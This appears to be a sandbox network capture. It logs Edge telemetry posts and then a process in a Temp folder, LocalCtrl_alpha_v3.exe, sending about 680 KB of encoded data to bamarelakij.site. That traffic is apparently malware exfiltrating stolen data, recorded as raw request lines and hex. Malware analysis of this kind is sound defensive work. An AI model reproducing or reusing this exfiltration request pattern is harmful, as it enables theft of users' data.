Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:42:39 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49802	13.89.178.27	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:40 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158161&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5059 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; _C_ETH=1; msnup=
2025-01-09 13:42:40 UTC	5059	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 38 2e 31 36 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 65 36 31 30 34 35 37 2d 32 61 33 30 2d 34 66 66 63 2d 62 31 38 33 2d 39 61 62 63 32 64 38 64 32 66 34 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 37 39 34 33 31 35 36 34 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:42:38.160Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"ce610457-2a30-4ffc-b183-9abc2d8d2f42","epoch":"2794315646"},"app":{"locale
2025-01-09 13:42:40 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=6e017c67b0db4f1aa1c118ac9c427aec&HASH=6e01&LV=202501&V=4&LU=1736430160113; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:40 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=ec25fdc2f4744f799f750d6ec2211a93; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:40 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1952 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:42:39 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49804	13.89.178.27	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:40 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158922&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5391 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; msnup=
2025-01-09 13:42:40 UTC	5391	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 38 2e 39 31 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 65 36 31 30 34 35 37 2d 32 61 33 30 2d 34 66 66 63 2d 62 31 38 33 2d 39 61 62 63 32 64 38 64 32 66 34 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 37 39 34 33 31 35 36 34 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:42:38.917Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"ce610457-2a30-4ffc-b183-9abc2d8d2f42","epoch":"2794315646"},"app":{"locale
2025-01-09 13:42:40 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=a874b66f6600426f803699cadaee3774&HASH=a874&LV=202501&V=4&LU=1736430160854; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:40 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=f39557df9eea49f3a7b105be9a0c09bf; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:40 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1932 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:42:40 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49805	13.89.178.27	443	7320	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:41 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159160&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9892 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6; _EDGE_S=F=1&SID=054096348F3E6E7D2A41835B8E5C6FA2; _EDGE_V=1; msnup=
2025-01-09 13:42:41 UTC	9892	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 34 32 3a 33 39 2e 31 35 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 65 36 31 30 34 35 37 2d 32 61 33 30 2d 34 66 66 63 2d 62 31 38 33 2d 39 61 62 63 32 64 38 64 32 66 34 32 22 2c 22 65 70 6f 63 68 22 3a 22 32 37 39 34 33 31 35 36 34 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-09T13:42:39.159Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"ce610457-2a30-4ffc-b183-9abc2d8d2f42","epoch":"2794315646"},"app":{"loc
2025-01-09 13:42:41 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=880aaaa54dee4c94b8f466026d0e90ab&HASH=880a&LV=202501&V=4&LU=1736430161129; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:42:41 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=f7e7d2ca8fb342d7939239d7f7503472; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:12:41 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1969 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:42:40 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49811	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:50 UTC	439	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 681979 Host: bamarelakij.site
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 3f 12 0a 00 08 00 00 00 52 00 00 00 fd 04 e9 09 95 a7 40 16 d7 35 c9 59 85 81 00 00 00 00 00 00 00 00 00 00 fe 02 f4 84 c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 9a a1 1d 2e aa b9 b2 39 b9 2e 34 ba 31 b2 39 3a 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 9e a1 1d 2e aa b9 b2 39 b9 2e 34 ba 31 b2 39 3a 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7 b3 b4 37 10 22 b0 Data Ascii: ?R@5Y`HIL`HS49.9.419:.88":.&6.6.49.9":`H"36:.9.419:.88":.&6.6.49.9":."36:49199.49.8936."36:.&7"
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: 28 2d 21 a9 39 b3 a0 2c 3d 18 23 a5 b5 38 ba 37 25 9a ba 38 9b aa 38 a2 37 27 b6 a7 a1 ba ac a7 bc b1 b8 21 39 25 a5 95 b6 a3 bb 2d 2d 28 bb a7 1a 1c 1a b2 b9 a3 2b a6 b0 95 22 18 99 a0 18 99 25 a8 3b a7 3c aa a4 b6 21 b0 2b 24 39 a5 31 31 ac 21 19 aa 35 34 23 a3 21 33 31 a3 18 25 24 a0 99 35 b3 b3 a5 39 a0 99 a0 aa b6 a7 a8 bb b7 ba 1a a3 b0 3d 21 9c 3c 3d ba b9 97 1c 9a 24 b6 18 a4 97 31 b2 24 3a a9 3a 1a a6 b7 a9 3b a8 bb 33 a7 3d 25 9a 95 a5 a9 a5 33 a9 29 9c 3a ac b6 3d 22 1a b0 2b 3a 98 19 a5 36 2b b0 b2 1c a1 3a 3a 2b a7 a6 a4 a2 2b a8 1b 24 b8 39 b9 29 3d 9a 34 97 b1 2b 35 bc 31 23 ac a7 a3 95 a9 a8 36 19 21 b1 24 1a 27 19 a7 a9 bc 24 a3 b6 98 1a ab 34 99 38 37 a6 a0 a5 31 bb bc 38 38 9b 3d 38 18 b4 36 ab 9b b3 9c 2b a4 a1 a6 99 1a 98 98 b4 a3 26 Data Ascii: (-!9,=#87%887'!9%--(+"%;<!+$911!54#!31%$59=!<=$1$::;3=%3):="+:6+::++$9)=4+51#6!$'$487188=86+&
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: a7 28 1a 2d 95 a2 9c 35 ba b9 b6 a0 33 a1 a1 2c 3d a8 3d b1 9c b7 25 a8 b4 1a 1b 2d 98 1b 99 a8 23 31 24 a2 29 a5 34 b7 b1 34 29 b7 a8 23 9c 9c ba a8 9c a8 1c a4 1b 24 a5 1a 2a 29 9b a5 26 2a 22 bc bc 2a 99 9a b2 99 b3 bc ba a7 a3 34 34 26 3b 2a b6 3b ab b7 b7 1b 3d 18 aa 28 21 a7 1c 21 1b 3b 1c 99 9c 23 25 9b 1a 23 b8 9c 99 a2 aa a6 25 a2 b4 34 21 b3 b7 1c bc a1 24 25 21 b3 b7 1c 3c a1 28 25 21 b3 39 b9 2d 21 a4 aa b3 bb 2a 18 a6 b3 b6 a5 a8 1a a7 a6 a6 b3 b9 a2 b3 bb a9 b1 ac 21 a5 aa b3 bb a9 b1 2d 21 a2 27 21 b3 b5 95 9a 21 22 3b 21 34 b7 1b b4 a6 b5 a3 a5 b2 98 b5 aa 36 a1 9b 3b ac 98 23 a8 bc 3b bb 18 b4 1a 26 a9 9a 3b 18 b9 a1 b5 b8 32 22 9b a0 b7 a5 24 98 95 34 b5 2b 21 a5 33 a9 3b ab 29 a9 aa 29 35 97 26 b7 b8 21 aa 95 35 b5 ab 21 b0 2c 2a 3d 3d Data Ascii: (-53,==%-#1$)44)#$)&"44&;;=(!!;#%#%4!$%!<(%!9-!!-!'!!";!46;#;&;2"$4+!3;))5&!5!,==
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: b8 36 9c a4 98 aa 9b 33 37 b5 a1 97 39 a6 38 26 ac 19 aa 3c b1 23 1c 36 21 31 aa 1b ba ab 2d a8 a9 2d b8 a0 39 9c a9 38 b1 95 a3 a1 24 24 24 a9 38 28 a8 b2 ab 9a b8 28 98 a2 a0 26 ab 99 37 34 ba 97 aa 21 b6 b7 9c 1a b8 1a 1c b9 a5 b9 19 a1 39 31 9c a1 9a 2c a4 a6 98 bc 1c aa 38 b3 3b 33 b1 1a 39 21 b2 b8 a4 1a ac b0 39 b0 18 2c a5 3a b6 29 a4 36 99 b3 1b 3b 24 33 29 1b 37 b7 31 b5 98 b6 2b bb b2 37 2d bc b1 29 2d b5 97 99 19 33 aa b4 1a a5 35 a8 2a 1a ba aa 22 b6 ba b2 aa b3 39 9c 36 23 3c 24 a7 a7 9b b9 a1 a3 1a b1 9c b6 3a b4 3d b5 34 19 2a b0 bc 28 34 31 b9 b6 9a b9 ac 2a 9b 95 a7 3c 3a 97 a5 b9 98 b1 38 3c a9 21 b1 95 3b 2d 2c b9 ac ba 29 a0 a7 a5 b5 19 b8 18 38 26 39 b5 28 3c 33 21 a6 9a b0 21 2a 28 97 a2 b8 2a a2 ac 3d 2c 1b 9b b4 b4 3b a0 b0 a2 b5 Data Ascii: 63798&<#6!1--98$$$8((&74!91,8;39!9,:)6;$3)71+7-)-35"96#<$:=4(41<:8<!;-,)8&9(<3!!(*=,;
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: 28 32 ba 29 b7 9c b9 34 22 3d a1 9b 98 ac a4 19 9c b3 99 19 21 ba 9b 95 35 ac ba 39 a6 b3 ac a3 2c 31 ba ac 2b 34 3c 95 1c 34 a7 95 99 b0 a3 23 a9 9b a8 b1 a3 b9 24 b3 bc 1b 2b 9b bc a7 9b 23 b7 bb 36 97 a8 2c 32 ab 26 aa 2c a4 b8 37 b8 39 39 9a 98 97 27 a4 35 34 23 a0 28 a6 2d 98 36 1b 3b b4 b4 26 a7 a0 23 b8 24 3d b4 2a a4 3d 9c a8 97 98 2d 34 a7 3b 97 1a 33 38 97 ba 28 1a 33 39 3b 95 24 1b 97 97 34 95 37 95 1a 97 34 95 ba 97 1a 33 39 97 95 24 1b 33 9b 35 95 24 1b 9b 97 34 95 3b 97 1a 33 38 97 ba 28 1a 33 39 3b 95 24 1b 97 97 34 95 37 95 1a 97 34 95 ba 97 1a 33 39 97 95 24 1b 33 9b 35 95 3b bb 37 ab 97 bb 3a b9 97 32 9c bb a4 a9 3a 1c 3c 18 9b bc a3 23 1a bb a0 a5 2c a8 24 b7 21 a5 24 38 3b 2a 23 a5 b5 3c 36 34 b7 3d 25 b7 1b 23 a9 a3 b5 2c 19 b1 1b 1c Data Ascii: (2)4"=!59,1+4<4#$+#6,2&,799'54#(-6;&#$==-4;38(39;$47439$35$4;38(39;$47439$35;7:2:<#,$!$8;#<64=%#,
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: 22 29 a7 3c 3a 1b ab aa b5 a3 a4 33 99 b4 18 ac 28 3c 97 33 a0 29 3c a6 19 21 a6 b1 35 22 95 32 23 a6 2a b4 a5 b5 9b 37 a1 2d 2c 97 b9 b5 22 a6 1c b7 3a 23 b7 b5 bc b7 b6 a1 a2 39 b4 a8 1b 9a 3d aa aa 27 b6 97 31 22 1a b7 29 25 24 a3 19 3d b7 28 b0 35 21 32 35 26 a6 99 31 1b a8 a4 29 36 a2 b4 b9 9c a5 a7 24 b0 a2 2a 1b 31 b1 b1 b4 28 1a 2a 38 b1 31 a2 a9 a7 99 99 a4 29 bb bc b4 25 a7 24 25 3c b3 a2 38 9c a2 b4 b7 2b b8 a0 b0 97 a4 23 2d 25 ac 3b ac b7 19 37 19 b8 27 a3 29 aa 97 37 99 a2 27 a9 1c ab 35 ac b7 23 a3 b3 18 2a 22 1a b4 ba 38 19 a3 24 3c a1 37 1c 28 37 3b ab 26 ba b5 33 34 21 ba 97 a1 36 99 27 32 a7 21 a7 a3 a3 95 3d 21 34 3c 9b a7 34 18 a0 a5 b3 39 9b b3 35 2d ab 2a 38 3a 98 1c 31 b6 a6 2b a2 32 a1 27 2b b1 35 a5 31 b0 3c 34 3b 26 a5 a8 3a 99 Data Ascii: ")<:3(<3)<!5"2#7-,":#9='1")%$=(5!25&1)6$1(81)%$%<8+#-%;7')7'5#"8$<7(7;&34!6'2!=!4<495-*8:1+2'+51<4;&:
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: 31 ab b1 35 b3 33 2b 9c a0 98 98 a9 26 18 b9 1b b3 ab 1a a6 b3 2b 24 38 27 1c a6 b2 b1 18 31 98 3b b6 26 a2 b3 b4 b7 a5 b3 23 a9 a8 a8 21 31 18 a2 a9 b3 bc 29 24 a4 b4 19 1b b2 35 a3 3a a2 32 b9 a0 21 24 b1 18 b6 1b a1 32 a9 19 1a b1 a1 36 a9 9c 29 a5 34 bc 28 a1 b7 19 25 b8 b4 a9 b4 98 bc 34 b6 38 b9 b7 2b 27 a0 2d 29 ba a9 22 b4 3c 2b ba 28 3d 22 b5 b6 b1 27 9a 24 2c 3c 21 31 2b 99 29 b1 a5 2d b9 29 aa a6 35 a1 95 1c 24 b0 26 a0 3a 9c bc b3 1b 1b 3b 25 2c 21 9b 3a 1c 99 36 a7 3a 29 a7 23 1a 9c 36 32 21 a5 b8 b1 a0 b7 33 b7 36 a1 38 29 2c 3b 18 29 29 b4 3a aa 3b b1 32 34 bc a6 b6 3c 97 2a 25 24 b7 2b 37 b7 3c 29 ab a5 b5 a2 ac b3 38 a2 b7 1c 39 25 1c a1 3a 24 18 a5 22 34 a7 38 b5 a9 95 b3 ba b3 b0 1b 33 2b 2b 31 2a a7 a1 bc 9c b0 19 3a b7 33 26 18 a7 35 Data Ascii: 153+&+$8'1;&#!1)$5:2!$26)4(%48+'-)"<+(="'$,<!1+)-)5$&:;%,!:6:)#62!368),;)):;24<%$+7<)89%:$"483++1:3&5
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: 25 34 34 29 99 b6 b0 99 aa ab 1a a3 24 3d 1c 3c a2 a9 a7 3b 1a 3b 37 21 a7 b5 a3 ab 21 9a aa ba b8 9c 31 25 9a 28 39 39 2d a7 32 b8 35 b1 19 a8 3c 22 b6 2a 35 22 99 19 a8 b0 bb 3b 1b b2 9a ac 9a 36 27 35 a6 a1 32 b2 9a bc 9a 99 19 37 2c 26 3d bc 26 34 b9 b6 29 34 3b a8 b1 19 9a 28 b1 19 24 9a ba 9c 26 b7 ac 95 99 ba 29 29 a2 aa a9 23 aa 37 aa ba b4 2c b8 a5 27 3a 26 a2 a6 1c 27 3b 32 26 b9 b4 9c 2d 97 19 b2 33 39 b2 24 3c 95 ba 34 9c b0 19 ac 9a 24 b5 31 28 9a 2c b3 22 33 99 3c 97 3c 33 b1 2a 99 b6 1c 35 99 39 19 aa b2 1b a1 2b b4 b9 38 36 a6 1a 31 b6 2d 37 a8 33 95 98 97 a6 3b 3c 2a 2d 23 b6 ac 1c bc a6 3d 9c b3 9a 37 3d a2 3d 21 a2 3d 31 bc a4 3d 97 9c b6 18 9a 97 23 b7 35 9a 37 33 1c 3a 1b 2c ac 34 a3 37 29 2d bc 19 b4 2d bb 19 b8 3a b0 a2 b3 2b 39 31 Data Ascii: %44)$=<;;7!!1%(99-25<"5";6'527,&=&4)4;($&))#7,':&';2&-39$<4$1(,"3<<359+861-73;<*-#=7==!=1=#573:,47)--:+91
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: a1 bc 2a 22 b4 a8 26 a1 21 21 27 a7 22 b1 a8 a9 22 2a a6 a8 33 ba a1 27 31 a5 26 a0 2c a8 2c 95 a7 a6 a4 23 b4 25 32 34 33 34 29 1a b8 a5 b7 a6 18 29 2b a9 b6 a0 ab b4 27 36 18 bb 22 22 a7 33 a4 1c 1a a6 19 29 2b 21 a8 25 b2 22 a1 ac 2d ab 3d bc b3 b4 3a a5 a9 b5 2d 32 a0 a8 28 b4 b7 1b b0 2a 37 a2 a9 a4 34 3a b2 2c b3 3b b6 21 b0 1b b3 39 3a 9a 21 27 1a b4 33 22 b2 1a 29 b8 b5 b1 98 21 3a 1a a0 b1 38 2a aa b1 a0 99 a6 27 bb a1 ac 37 31 a4 37 b6 a2 a4 a6 34 a8 9b 31 a5 a6 a3 21 a1 b4 38 24 25 a2 23 a7 a3 2d b3 b0 37 35 b8 a6 36 a3 27 b1 23 ba b3 a0 35 ab bc 31 b1 a6 21 2c 99 b5 2b 97 a1 1b b6 b1 35 b5 25 37 b3 98 18 2a 21 b0 21 a4 2b 3c 97 b6 a3 21 32 98 b8 21 b1 b9 25 3c b1 28 b3 a6 26 b7 38 23 2b a0 b7 1c 9a b9 34 aa a3 ab bb 2c 2c 22 9c ac a3 2a 39 a7 Data Ascii: "&!!'""3'1&,,#%2434))+'6""3)+!%"-=:-2(74:,;!9:!'3")!:8'71741!8$%#-756'#51!,+5%7!!+<!2!%<(&8#+4,,"9
2025-01-09 13:42:50 UTC	15331	OUT	Data Raw: 27 b5 a5 98 36 2d a6 27 a9 39 3d 9a 27 2a 35 3d 3d a9 28 9c 1b 95 95 a6 b8 2a a0 2d 1b b1 ba 2c 22 25 36 31 b9 3a 3a 2c 2d 28 34 b7 a2 3b 26 2c a6 28 25 35 a6 b6 22 a0 19 a5 99 39 a7 a8 a0 b2 b6 38 18 b2 9a a6 24 a4 3b b4 b9 a0 b8 2a b9 ab 2d 34 98 36 97 1a bc 99 b8 28 ba a1 19 99 ab 19 98 1b a9 3c 32 b3 3d 37 33 a7 22 27 95 3c b8 35 97 b2 1b a5 1c 33 a3 ab 1b a2 2a 32 bc b3 28 21 3d 2d 27 32 3b 22 9b 38 b7 3c 28 2b 19 27 97 aa 3d 2a 2b a4 19 a2 97 aa 3d 35 35 24 24 34 95 25 a2 35 9b b8 28 a6 a9 36 26 98 b5 32 ac 2d 1a 99 35 b9 b3 b4 a2 3d ba 28 a8 2b 28 a0 ac 18 ac a8 ab 28 29 2d b2 95 b3 34 33 21 23 9b a7 a1 3c 1c a1 aa 9b 1c 31 b9 25 2b 38 b6 3c 9b 22 a2 29 2b 19 a5 3c 3b 36 3b 37 3c b5 ab a0 35 bc 3c 33 a7 2a 3c a6 18 1b 9a 19 23 38 38 b5 99 b7 a8 9a Data Ascii: '6-'9='5==(-,"%61::,-(4;&,(%5"98$;-46(<2=73"'<532(!=-'2;"8<(+'=+=55$$4%5(6&2-5=(+(()-43!#<1%+8<")+<;6;7<5<3<#88
2025-01-09 13:42:52 UTC	814	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:52 GMT Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hazWYr1obMtWq2YwBYZFW%2BAZquuGJnyZTayFi6GfMMkBsTPGD8Vb7lNPIjkjP7qM7teLc9d%2BNkkmHKHX0KGev%2B969qnYw5Y0KjHQFx1YVV8q6DwPI20ScIzAC%2BC2MBlOJs2p"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da58acae4381-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1607&min_rtt=1606&rtt_var=606&sent=388&recv=689&lost=0&retrans=0&sent_bytes=2837&recv_bytes=684990&delivery_rate=1801357&cwnd=211&unsent_bytes=0&cid=1a305636daa99cb1&ts=1196&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49812	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

